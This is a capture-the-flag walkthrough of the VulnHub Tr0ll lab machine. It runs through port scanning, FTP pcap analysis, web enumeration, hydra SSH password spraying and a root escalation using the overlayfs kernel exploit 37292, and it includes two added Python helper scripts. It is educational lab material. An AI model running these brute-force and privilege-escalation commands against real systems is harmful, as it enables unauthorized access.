Vulnhub Tr0ll
Alright, another machine. Let’s start with nmap like always.
nmap -sC -sS -A -p- -T 4 -Pn 192.168.1.140 -oN nmap_scan
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-26 19:38 EDT
Nmap scan report for troll (192.168.1.140)
Host is up (0.00031s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_ 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:38:FF:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Alright: 21 FTP, 22 SSH and a website. That's cool. Let's check out the FTP to start with. I also ran searchsploit on vsftpd 3.0.2 just in case there's a known exploit for that particular version… and nope (the infamous vsftpd backdoor only ever shipped in 2.3.4). Let's proceed.
FTP
Connected to 192.168.1.140.
220 (vsFTPd 3.0.2)
Name (192.168.1.140:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (4.2770 MB/s)
Alright, so we got a pcap. Let's see what's going on inside with Wireshark.
It looks like an FTP session; if we follow the TCP stream of the control connection we get this.
220 (vsFTPd 3.0.2)
USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 10,0,0,12,202,172
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
226 Transfer complete.
TYPE A
200 Switching to ASCII mode.
PORT 10,0,0,12,172,74
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
QUIT
221 Goodbye.
So he retrieves a secret_stuff.txt. Hmm…
We obviously didn't see that file on the FTP server we connected to. One thing worth noticing in this transcript: it's active-mode FTP, so the file bytes never travel over this control connection. Each LIST and RETR is served over a separate data connection that the server opens back to the address in the preceding PORT command (10,0,0,12,202,172 means 10.0.0.12, port 202*256+172 = 51884), which lands in a different TCP stream in the capture. We'll come back to it if something else comes up.
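The following script is an added example and not part of the original write-up. It takes the control-channel transcript above (embedded as constructed sample input, copied from the "Follow TCP Stream" output) and pairs every PORT announcement with the LIST/RETR that uses it, producing the address, the decoded port and a Wireshark display filter for each data connection. It also understands the passive-mode 227 reply, which the capture here doesn't contain, so it generalizes beyond this one session. This is what explains the four conversations seen later in the Wireshark Conversations window: one control channel plus three data channels.

```python
"""Locate FTP data connections from a captured control channel.

Added example, not code from the original post. In active mode the client
sends "PORT h1,h2,h3,h4,p1,p2" and the server connects back to
h1.h2.h3.h4 on port p1*256+p2 for the next LIST/RETR/STOR; in passive mode
the server answers "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" and the
client connects there. Either way the file bytes never cross the control
connection, which is why following the control stream shows
"RETR secret_stuff.txt" but not the file contents.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

PORT_RE = re.compile(r"^PORT\s+(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\s*$")
PASV_RE = re.compile(r"^227\b.*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
DATA_COMMANDS = {"LIST", "NLST", "RETR", "STOR", "APPE"}

# Constructed sample input: the control channel as shown by "Follow TCP
# Stream" on lol.pcap (whole exchange kept for realism).
CONTROL_STREAM = """\
220 (vsFTPd 3.0.2)
USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 10,0,0,12,202,172
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
226 Transfer complete.
TYPE A
200 Switching to ASCII mode.
PORT 10,0,0,12,172,74
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
226 Directory send OK.
QUIT
221 Goodbye.
"""


@dataclass(frozen=True)
class DataChannel:
    mode: str      # "active" (PORT from client) or "passive" (227 from server)
    host: str      # endpoint that accepts the data connection
    port: int
    command: str   # the data command served on this connection

    def wireshark_filter(self) -> str:
        """Display filter that isolates this data connection in the capture."""
        return f"ip.addr == {self.host} && tcp.port == {self.port}"


def parse_endpoint(groups: tuple[str, ...]) -> tuple[str, int]:
    """Decode the six comma-separated decimal fields of PORT / 227."""
    h1, h2, h3, h4, p1, p2 = (int(g) for g in groups)
    if any(x > 255 for x in (h1, h2, h3, h4, p1, p2)):
        raise ValueError("field out of range in PORT/227")
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def data_channels(control_stream: str) -> list[DataChannel]:
    """Pair each PORT/227 announcement with the data command that uses it.

    A PORT never followed by a data command (or superseded by another PORT)
    yields no channel, which is how the server treats it too."""
    channels: list[DataChannel] = []
    pending: tuple[str, str, int] | None = None
    for raw in control_stream.splitlines():
        line = raw.strip()
        if (m := PORT_RE.match(line)):
            pending = ("active", *parse_endpoint(m.groups()))
        elif (m := PASV_RE.match(line)):
            pending = ("passive", *parse_endpoint(m.groups()))
        elif pending and line.split(" ", 1)[0].upper() in DATA_COMMANDS:
            channels.append(DataChannel(*pending, command=line))
            pending = None
    return channels


if __name__ == "__main__":
    for ch in data_channels(CONTROL_STREAM):
        print(f"{ch.command:<24} {ch.mode:<8} {ch.host}:{ch.port:<6} "
              f"filter: {ch.wireshark_filter()}")
```

Run against this capture it reports three data channels on 10.0.0.12 (ports 44486, 51884 and 44106); the middle one, `tcp.port == 51884`, is the stream carrying the 147 bytes of secret_stuff.txt. To get the control transcript out of a pcap without the GUI, `tshark -r lol.pcap -q -z follow,tcp,ascii,0` dumps stream 0 as text.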
HTTP
So we got a webserver, let’s see what nikto has to say about it.
nikto -h 192.168.1.140
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.140
+ Target Hostname: 192.168.1.140
+ Target Port: 80
+ Start Time: 2017-05-26 19:49:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2017-05-26 19:49:35 (GMT-4) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We got a robots.txt, a /secret/ folder and Apache 2.4.7 running.
The robots.txt contains nothing beyond the /secret entry, and /secret/ only holds a trollish picture. This doesn't help. Let's see if dirb finds something.
dirb http://192.168.1.140 /usr/share/dirb/wordlists/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 26 20:07:19 2017
URL_BASE: http://192.168.1.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.140/ ----
+ http://192.168.1.140/index.html (CODE:200|SIZE:36)
+ http://192.168.1.140/robots.txt (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.140/secret/
+ http://192.168.1.140/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.1.140/secret/ ----
+ http://192.168.1.140/secret/index.html (CODE:200|SIZE:37)
-----------------
END_TIME: Fri May 26 20:07:22 2017
DOWNLOADED: 9224 - FOUND: 4
Nothing good there either. Well, shit. Let's go back to the FTP.
FTP part 2
So let's spend a little more time on the pcap. Let's look at the conversations (Statistics > Conversations in Wireshark, TCP tab).
There are four TCP conversations: the control channel plus one data connection for each of the LIST, RETR and LIST commands. Let's follow each of them. The third one, the data connection carrying secret_stuff.txt, has something…
Well, well, well, aren't you just a clever little devil, you almost found the
sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
So it looks like the file is more trolling. Let's try appending sup3rs3cr3tdirlol to the URL anyway.
It leads to another directory listing, this time with a file called roflmao.
file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24,
BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
Gah, let's run it (in a throwaway VM; on an unstripped binary like this, `strings roflmao` is the safer first look and usually exposes a hard-coded message without executing untrusted code).
chmod +x roflmao
./roflmao
Find address 0x0856BF to proceed
Alright, gdb time. After spending 20 minutes on it, I was like, man, this address does not exist. It doesn't: 0x0856BF isn't something to find in the binary, it's a directory name, and once again I had to append it to the URL. GODDAMNIT!
Let's go to http://192.168.1.140/0x0856BF/
There are two folders this time.
Between them we get a file called which_one_lol.txt and one called Pass.txt.
cat Pass.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
cat which_one_lol.txt
Good_job_:)
Well, this doesn't help much. A password for what, root?
Let's put all of them in a file and use hydra to try them against SSH with root as the user.
hydra -l root -P troll_pass.txt 192.168.1.140 ssh
Nope. So, let's see: there's a folder called this_folder_contains_the_password and the other one is called good_luck.
Let's assume the big list is usernames and the content of which_one_lol.txt is the password. Let's try hydra again.
hydra -V -L troll_pass.txt -P password.txt -t 4 192.168.1.140 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or
secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-26 23:20:19
[DATA] max 4 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1),
~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.1.140 - login "maleus" - pass "Good_job_:)" - 1 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "ps-aux" - pass "Good_job_:)" - 2 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "felux" - pass "Good_job_:)" - 3 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Eagle11" - pass "Good_job_:)" - 4 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "genphlux " - pass "Good_job_:)" - 5 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "usmc8892" - pass "Good_job_:)" - 6 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "blawrg" - pass "Good_job_:)" - 7 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "wytshadow" - pass "Good_job_:)" - 8 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Good_job_:)" - 9 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "overflow" - pass "Good_job_:)" - 10 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Good_job_:)" - 11 of 11 [child 1]
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-26 23:20:27
Nada. What if he's trolling us (once again) and the password is literally Pass.txt…
hydra -V -L troll_pass.txt -p "Pass.txt" -t 4 192.168.1.140 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or
secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-27 02:09:18
[DATA] max 4 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1),
~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.1.140 - login "maleus" - pass "Pass.txt" - 1 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "ps-aux" - pass "Pass.txt" - 2 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "felux" - pass "Pass.txt" - 3 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Eagle11" - pass "Pass.txt" - 4 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "genphlux " - pass "Pass.txt" - 5 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "usmc8892" - pass "Pass.txt" - 6 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "blawrg" - pass "Pass.txt" - 7 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "wytshadow" - pass "Pass.txt" - 8 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Pass.txt" - 9 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "overflow" - pass "Pass.txt" - 10 of 11 [child 3]
[RE-ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Pass.txt" - 10 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Pass.txt" - 11 of 11 [child 0]
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-27 02:09:32
Man, this is nothing. This doesn't make any sense. So after trying for over two hours, I looked at a guide. Well… shit… overflow/Pass.txt is supposed to work.
I re-ran the exact same spray with 'Pass.txt' in single quotes instead of double quotes, and this time it went through.
hydra -V -L troll_pass.txt -p 'Pass.txt' -t 4 192.168.1.140 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-27 02:15:09
[DATA] max 4 tasks per 1 server, overall 64 tasks, 11 login tries (l:11/p:1), ~0 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target 192.168.1.140 - login "maleus" - pass "Pass.txt" - 1 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "ps-aux" - pass "Pass.txt" - 2 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "felux" - pass "Pass.txt" - 3 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "Eagle11" - pass "Pass.txt" - 4 of 11 [child 3]
[ATTEMPT] target 192.168.1.140 - login "genphlux " - pass "Pass.txt" - 5 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "usmc8892" - pass "Pass.txt" - 6 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "blawrg" - pass "Pass.txt" - 7 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "wytshadow" - pass "Pass.txt" - 8 of 11 [child 3]
[RE-ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Pass.txt" - 8 of 11 [child 2]
[ATTEMPT] target 192.168.1.140 - login "vis1t0r" - pass "Pass.txt" - 9 of 11 [child 1]
[ATTEMPT] target 192.168.1.140 - login "overflow" - pass "Pass.txt" - 10 of 11 [child 0]
[ATTEMPT] target 192.168.1.140 - login "Good_job_:)" - pass "Pass.txt" - 11 of 11 [child 3]
[22][ssh] host: 192.168.1.140 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-27 02:15:16
My first takeaway was "ALWAYS FREAKING USE SINGLE QUOTES in hydra", but that can't be the explanation: to a POSIX shell "Pass.txt" and 'Pass.txt' are the same argument (there is no $, `, \ or ! in it to expand), and hydra printed the identical pass "Pass.txt" in both runs. The output here doesn't prove it, but a far more plausible cause is the fail2ban instance that shows up later in the process list: the failed run came after a series of wrong guesses against the same host, and the ban had expired by the time of the third run. The practical check when a credential you have good reason to trust fails: try it once by hand (ssh overflow@192.168.1.140), and re-run hydra with fewer parallel tasks (-t 1) before blaming the syntax.
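As an added example (not code from the original post), the script below does the two bits of hygiene this section calls for: it turns the Pass.txt listing into a clean login list, and it builds the hydra command line with shlex so that arguments are quoted only where the shell actually needs it. Two details in the hydra output above motivate it: the login went out as "genphlux " with a trailing space (the "< -- Definitely not this one" annotation was stripped by hand and not cleanly, so that guess could never have matched), and the same password was tried as "Pass.txt" and 'Pass.txt' as if the quotes changed the value. The Pass.txt content is embedded as constructed sample input; the output file name troll_users.txt is my choice.

```python
"""Clean the Pass.txt listing into a login list and emit a hydra command
line whose arguments are quoted only where a POSIX shell needs it.

Added example, not code from the original post. shlex.quote leaves a bare
word like Pass.txt untouched (it is made only of "safe" characters), and
wraps a value such as Good_job_:) in single quotes because ")" would
otherwise be a shell syntax error.
"""
from __future__ import annotations

import re
import shlex

# Constructed sample input: the Pass.txt listing as shown on the page.
PASS_TXT = """\
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
"""

# Inline annotation the box author left in the list ("< -- ...").
ANNOTATION_RE = re.compile(r"\s*<\s*--.*$")


def clean_logins(listing: str) -> list[str]:
    """Drop annotations, surrounding whitespace, blank lines and duplicates,
    keeping first-seen order. The entry flagged "not this one" stays in:
    a hint from a troll box is not evidence."""
    seen: set[str] = set()
    logins: list[str] = []
    for raw in listing.splitlines():
        name = ANNOTATION_RE.sub("", raw).strip()
        if name and name not in seen:
            seen.add(name)
            logins.append(name)
    return logins


def needs_quoting(arg: str) -> bool:
    """True if a POSIX shell would treat the bare argument differently."""
    return shlex.quote(arg) != arg


def hydra_command(target: str, logins_file: str, password: str,
                  service: str = "ssh", tasks: int = 1) -> str:
    """Single-password spray over a login file. tasks=1 keeps one
    connection at a time, the gentlest setting against a host running
    fail2ban; raise it once you know the lockout policy."""
    argv = ["hydra", "-V", "-t", str(tasks), "-L", logins_file,
            "-p", password, target, service]
    return shlex.join(argv)   # quotes only what must be quoted


if __name__ == "__main__":
    logins = clean_logins(PASS_TXT)
    with open("troll_users.txt", "w") as fh:
        fh.write("\n".join(logins) + "\n")
    for pw in ("Pass.txt", "Good_job_:)"):
        print(f"{pw!r}: needs quoting = {needs_quoting(pw)}")
        print("  " + hydra_command("192.168.1.140", "troll_users.txt", pw))
```

For Pass.txt the generated command contains no quotes at all, which is the point: the two hydra invocations in this section handed the daemon the same bytes, so whatever made the second one succeed, it wasn't the quoting.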
So we’re in.
Enumeration
Let’s see the kernel
uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
I went AFK for a bit and came back to this:
Broadcast Message from root@trol
(somewhere) at 23:45 ...
TIMES UP LOL!
Super trollish. I also saw fail2ban running in the process list (ps aux), which is worth keeping in mind for the SSH brute force earlier:
root 912 0.0 0.5 5616 2560 ? Ss 23:11 0:00 /usr/sbin/apache2 -k start
www-data 915 0.0 0.3 228248 1992 ? Sl 23:11 0:00 /usr/sbin/apache2 -k start
www-data 916 0.0 0.3 228248 1992 ? Sl 23:11 0:00 /usr/sbin/apache2 -k start
root 1166 0.0 1.3 38660 6996 ? Sl 23:11 0:00 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid
So if I searchsploit the 3.13 kernel, 37292 (the overlayfs local privilege escalation, CVE-2015-1328, for Ubuntu 14.04 kernels 3.13.0 through 3.19) looks like it can help us out. Copy it over, compile and run:
overflow@troll:/tmp$ gcc 37292.c
overflow@troll:/tmp$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1002(overflow)
#
And that's it. So much trolling… Argh. Still, good game.